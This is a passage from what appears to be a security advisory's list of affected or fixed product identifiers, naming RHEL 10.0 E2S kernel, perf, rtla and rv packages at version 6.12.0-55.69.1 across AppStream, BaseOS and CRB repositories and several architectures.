"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
